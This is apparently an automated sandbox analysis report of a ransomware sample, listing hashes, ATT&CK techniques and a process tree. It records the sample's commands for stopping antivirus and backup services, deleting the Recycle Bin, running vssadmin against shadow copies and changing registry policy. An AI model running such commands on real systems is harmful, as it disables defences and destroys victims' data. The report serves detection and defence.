1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
78s
max time network
100s
platform
windows10_x64
resource
win10v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Size

107KB
MD5

26b35eb4806754b0e7d71b547478448e
SHA1

f0322d746071c1594ae37bae2467781f42e6ee3c
SHA256

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d
SHA512

6663d50e19ae58f6cc74f4edaa83b60a0f1cb42e8190056e444fc1c722cf7caccea488bb2e2fe250c039286e2fc4a3fb0520f40aea7f31734ea210cc6155b9b2

Score

9^/10

ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\Pictures\UpdateRestore.tiff.b0spyl	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\UpdateRestore.tiff	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
File created	C:\Users\Admin\Pictures\StopImport.png.b0spyl	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

Drops startup file 1 IoCs

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
10912	vssadmin.exe
10840	vssadmin.exe
10832	vssadmin.exe
10864	vssadmin.exe
10852	vssadmin.exe
10944	vssadmin.exe
10904	vssadmin.exe
10888	vssadmin.exe
10872	vssadmin.exe
10936	vssadmin.exe
10928	vssadmin.exe
10880	vssadmin.exe
10920	vssadmin.exe
10896	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
9720	taskkill.exe
10188	taskkill.exe
10052	taskkill.exe
9952	taskkill.exe
9928	taskkill.exe
9736	taskkill.exe
9760	taskkill.exe
9704	taskkill.exe
9696	taskkill.exe
8476	taskkill.exe
10220	taskkill.exe
10172	taskkill.exe
10132	taskkill.exe
9776	taskkill.exe
9600	taskkill.exe
9616	taskkill.exe
9576	taskkill.exe
8644	taskkill.exe
10148	taskkill.exe
9980	taskkill.exe
9824	taskkill.exe
9632	taskkill.exe
9664	taskkill.exe
10156	taskkill.exe
9808	taskkill.exe
9744	taskkill.exe
9728	taskkill.exe
9680	taskkill.exe
9672	taskkill.exe
10092	taskkill.exe
10012	taskkill.exe
9972	taskkill.exe
9904	taskkill.exe
9864	taskkill.exe
8580	taskkill.exe
9944	taskkill.exe
9544	taskkill.exe
9536	taskkill.exe
9656	taskkill.exe
9624	taskkill.exe
9568	taskkill.exe
10076	taskkill.exe
9840	taskkill.exe
9816	taskkill.exe
9784	taskkill.exe
9768	taskkill.exe
9552	taskkill.exe
9832	taskkill.exe
9800	taskkill.exe
9712	taskkill.exe
9592	taskkill.exe
9560	taskkill.exe
9752	taskkill.exe
7096	taskkill.exe
10044	taskkill.exe
10020	taskkill.exe
10004	taskkill.exe
9792	taskkill.exe
9896	taskkill.exe
9648	taskkill.exe
9640	taskkill.exe
10180	taskkill.exe
9872	taskkill.exe
9584	taskkill.exe

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2304 PING.EXE

pid	process
2304	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

pid	process
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Token: SeDebugPrivilege	9808	taskkill.exe
Token: SeDebugPrivilege	9736	taskkill.exe
Token: SeDebugPrivilege	9712	taskkill.exe
Token: SeDebugPrivilege	9944	taskkill.exe
Token: SeDebugPrivilege	9672	taskkill.exe
Token: SeDebugPrivilege	9656	taskkill.exe
Token: SeDebugPrivilege	9832	taskkill.exe
Token: SeDebugPrivilege	9560	taskkill.exe
Token: SeDebugPrivilege	9536	taskkill.exe
Token: SeDebugPrivilege	10076	taskkill.exe
Token: SeDebugPrivilege	9988	taskkill.exe
Token: SeDebugPrivilege	9552	taskkill.exe
Token: SeDebugPrivilege	8644	taskkill.exe
Token: SeDebugPrivilege	9608	taskkill.exe
Token: SeDebugPrivilege	9928	taskkill.exe
Token: SeDebugPrivilege	9980	taskkill.exe
Token: SeDebugPrivilege	9632	taskkill.exe
Token: SeDebugPrivilege	9728	taskkill.exe
Token: SeDebugPrivilege	10060	taskkill.exe
Token: SeDebugPrivilege	9688	taskkill.exe
Token: SeDebugPrivilege	9576	taskkill.exe
Token: SeDebugPrivilege	9592	taskkill.exe
Token: SeDebugPrivilege	9704	taskkill.exe
Token: SeDebugPrivilege	9744	taskkill.exe
Token: SeDebugPrivilege	10012	taskkill.exe
Token: SeDebugPrivilege	9624	taskkill.exe
Token: SeDebugPrivilege	9648	taskkill.exe
Token: SeDebugPrivilege	9680	taskkill.exe
Token: SeDebugPrivilege	9848	taskkill.exe
Token: SeDebugPrivilege	9616	taskkill.exe
Token: SeDebugPrivilege	9752	taskkill.exe
Token: SeDebugPrivilege	9760	taskkill.exe
Token: SeDebugPrivilege	9640	taskkill.exe
Token: SeDebugPrivilege	9720	taskkill.exe
Token: SeDebugPrivilege	10116	taskkill.exe
Token: SeDebugPrivilege	9584	taskkill.exe
Token: SeDebugPrivilege	9664	taskkill.exe
Token: SeDebugPrivilege	10108	taskkill.exe
Token: SeDebugPrivilege	9568	taskkill.exe
Token: SeDebugPrivilege	9800	taskkill.exe
Token: SeDebugPrivilege	9904	taskkill.exe
Token: SeDebugPrivilege	10044	taskkill.exe
Token: SeDebugPrivilege	9768	taskkill.exe
Token: SeDebugPrivilege	9544	taskkill.exe
Token: SeDebugPrivilege	9600	taskkill.exe
Token: SeDebugPrivilege	10156	taskkill.exe
Token: SeDebugPrivilege	9896	taskkill.exe
Token: SeDebugPrivilege	9784	taskkill.exe
Token: SeDebugPrivilege	9776	taskkill.exe
Token: SeDebugPrivilege	10004	taskkill.exe
Token: SeDebugPrivilege	9952	taskkill.exe
Token: SeDebugPrivilege	9880	taskkill.exe
Token: SeDebugPrivilege	10220	taskkill.exe
Token: SeDebugPrivilege	10020	taskkill.exe
Token: SeDebugPrivilege	10092	taskkill.exe
Token: SeDebugPrivilege	8580	taskkill.exe
Token: SeDebugPrivilege	9792	taskkill.exe
Token: SeDebugPrivilege	9856	taskkill.exe
Token: SeDebugPrivilege	9972	taskkill.exe
Token: SeDebugPrivilege	8476	taskkill.exe
Token: SeDebugPrivilege	10148	taskkill.exe
Token: SeDebugPrivilege	9824	taskkill.exe
Token: SeDebugPrivilege	10124	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

pid process

472 16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

pid process

472 16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

mshta.exe

pid process

12852 mshta.exe
12852 mshta.exe

pid	process
12852	mshta.exe
12852	mshta.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 472 wrote to memory of 3844	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3844	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3844	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3828	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3828	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3828	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 4024	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	cmd.exe
PID 472 wrote to memory of 4024	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	cmd.exe
PID 472 wrote to memory of 4024	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	cmd.exe
PID 472 wrote to memory of 4020	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 4020	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 4020	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3736	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3736	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3736	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3164	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3164	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3164	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 988	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 988	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 988	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 2204	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 2204	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 2204	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3692	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3692	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3692	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 3844 wrote to memory of 808	3844	net.exe	net1.exe
PID 3844 wrote to memory of 808	3844	net.exe	net1.exe
PID 3844 wrote to memory of 808	3844	net.exe	net1.exe
PID 3828 wrote to memory of 2648	3828	net.exe	net1.exe
PID 3828 wrote to memory of 2648	3828	net.exe	net1.exe
PID 3828 wrote to memory of 2648	3828	net.exe	net1.exe
PID 472 wrote to memory of 192	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 192	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 192	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 2376	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 2376	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 2376	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 3736 wrote to memory of 3820	3736	net.exe	net1.exe
PID 3736 wrote to memory of 3820	3736	net.exe	net1.exe
PID 3736 wrote to memory of 3820	3736	net.exe	net1.exe
PID 4020 wrote to memory of 3708	4020	net.exe	net1.exe
PID 4020 wrote to memory of 3708	4020	net.exe	net1.exe
PID 4020 wrote to memory of 3708	4020	net.exe	net1.exe
PID 3164 wrote to memory of 1972	3164	net.exe	net1.exe
PID 3164 wrote to memory of 1972	3164	net.exe	net1.exe
PID 3164 wrote to memory of 1972	3164	net.exe	net1.exe
PID 472 wrote to memory of 3668	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3668	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 3668	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 988 wrote to memory of 1300	988	net.exe	net1.exe
PID 988 wrote to memory of 1300	988	net.exe	net1.exe
PID 988 wrote to memory of 1300	988	net.exe	net1.exe
PID 472 wrote to memory of 1152	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 1152	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 472 wrote to memory of 1152	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 2204 wrote to memory of 508	2204	net.exe	net1.exe
PID 2204 wrote to memory of 508	2204	net.exe	net1.exe
PID 2204 wrote to memory of 508	2204	net.exe	net1.exe
PID 3692 wrote to memory of 3696	3692	net.exe	net1.exe
PID 3692 wrote to memory of 3696	3692	net.exe	net1.exe
PID 3692 wrote to memory of 3696	3692	net.exe	net1.exe
PID 472 wrote to memory of 2364	472	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:472
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3844
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:808
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3828
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:2648
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:4024
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4020
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:3708
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3736
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:3820
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3164
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:1972
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:988
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:1300
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2204
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:508
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3692
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:3696
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:192
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:3832
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBFCService /y
  2⤵
